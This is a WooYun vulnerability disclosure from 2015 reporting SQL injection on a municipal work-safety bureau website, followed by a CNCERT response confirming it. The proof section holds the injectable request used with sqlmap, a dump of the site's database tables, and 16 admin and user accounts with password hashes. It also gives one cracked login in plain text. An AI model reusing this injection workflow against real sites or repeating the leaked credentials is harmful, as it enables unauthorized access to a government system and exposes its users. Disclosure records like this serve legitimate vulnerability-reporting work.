当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0137732

漏洞标题:某市安全生产监督管理局存在SQL注入漏洞

相关厂商:cncert国家互联网应急中心

漏洞作者: qglfnt

提交时间:2015-09-02 20:08

修复时间:2015-10-20 08:40

公开时间:2015-10-20 08:40

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-09-02: 细节已通知厂商并且等待厂商处理中
2015-09-05: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-09-15: 细节向核心白帽子及相关领域专家公开
2015-09-25: 细节向普通白帽子公开
2015-10-05: 细节向实习白帽子公开
2015-10-20: 细节向公众公开

简要描述:

RT

详细说明:

注入数据包 sqlmap -r 1.txt

GET http://**.**.**.**/count.php?aid=1&v=2 HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**/bencandy.php?fid=24&id=411
Cookie: safedog-flow-item=C0519CA4971AEC40DBE3AD4F6135C8EA; USR=p9qlbuap%090%091440774349%09http%3A%2F%2F**.**.**.**%2Fbencandy.php%3Ffid%3D24%26id%3D411
Connection: keep-alive

漏洞证明:

数据库

20150829000215.png


表段

Database: kmsafety                                                             
[76 tables]
+------------------------+
| qb_ad_compete_place |
| qb_ad_compete_user |
| qb_ad_config |
| qb_ad_norm_place |
| qb_ad_norm_user |
| qb_admin_menu |
| qb_alonepage |
| qb_area |
| qb_article |
| qb_article_content_100 |
| qb_article_content_101 |
| qb_article_content_107 |
| qb_article_db |
| qb_article_module |
| qb_channel |
| qb_collection |
| qb_comment |
| qb_config |
| qb_copyfrom |
| qb_count |
| qb_crontab |
| qb_form_config |
| qb_form_content |
| qb_form_content_1 |
| qb_form_content_2 |
| qb_form_content_3 |
| qb_form_content_4 |
| qb_form_content_5 |
| qb_form_content_6 |
| qb_form_content_7 |
| qb_form_content_8 |
| qb_form_module |
| qb_form_reply |
| qb_friendlink |
| qb_friendlink_sort |
| qb_fu_article |
| qb_fu_sort |
| qb_gather_rule |
| qb_gather_sort |
| qb_group |
| qb_guestbook_config |
| qb_guestbook_content |
| qb_guestbook_sort |
| qb_hack |
| qb_jfabout |
| qb_jfsort |
| qb_keyword |
| qb_keywordid |
| qb_label |
| qb_limitword |
| qb_memberdata |
| qb_members |
| qb_menu |
| qb_module |
| qb_moneycard |
| qb_moneylog |
| qb_olpay |
| qb_pm |
| qb_propagandize |
| qb_regnum |
| qb_reply |
| qb_report |
| qb_shoporderproduct |
| qb_shoporderuser |
| qb_sort |
| qb_special |
| qb_special_comment |
| qb_spsort |
| qb_template |
| qb_template_bak |
| qb_upfile |
| qb_vote_comment |
| qb_vote_config |
| qb_vote_element |
| qb_vote_topic |
| qb_yzimg |
+------------------------+


字段

Database: kmsafety                                                             
Table: qb_members
[3 columns]
+----------+-----------------------+
| Column | Type |
+----------+-----------------------+
| password | varchar(32) |
| uid | mediumint(7) unsigned |
| username | varchar(30) |
+----------+-----------------------+


字段内容(帐号信息)

Database: kmsafety
Table: qb_members
[16 entries]
+-----+-------------+----------------------------------+
| uid | username | password |
+-----+-------------+----------------------------------+
| 1 | admin | b8429f230195926887f39d96abe5cdec |
| 2 | test | 1bf3bdadeaa8ef65abffc83c6b4ebf7a |
| 3 | zhoutiao | 5c0d033b5455b89950a10b502a25199f |
| 4 | zrl123 | fc5b0146d4e5713cd82c2c64ba03b850 |
| 5 | zhengxiang | ad83aed946189b9af06939962bd432b3 |
| 6 | yangwenqian | b8429f230195926887f39d96abe5cdec |
| 7 | ywq | c04d550d456230e3f26cccbccfa7f084 |
| 8 | fmc | a069623fbad30b03eb8970cd7ca15ca7 |
| 9 | whc | 7a70dfcf15d4d8329a63c86c94a46289 |
| 10 | hgc | b5122c946cd0d3e0543beb007d854cb1 |
| 11 | zjc | 87a27359cb2bdb7d4f6001570ff5268a |
| 12 | fgc | c4ca4238a0b923820dcc509a6f75849b |
| 13 | yjb | c33367701511b4f6020ec61ded352059 |
| 14 | jczd | 88cb6a0e468edc75b0432d580501c9a4 |
| 15 | dzz | 62026aaed5419a1ceaa229bf6886443e |
| 16 | bgsgly | ee1757e2f9c492197dff67860a9940e4 |
+-----+-------------+----------------------------------+


破解出其中一帐号密码
zhoutiao/zhoutiao123

修复方案:

过滤参数

版权声明:转载请注明来源 qglfnt@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-09-05 08:38

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT下发给云南分中心,由其后续协调网站管理单位处置。

最新状态:

暂无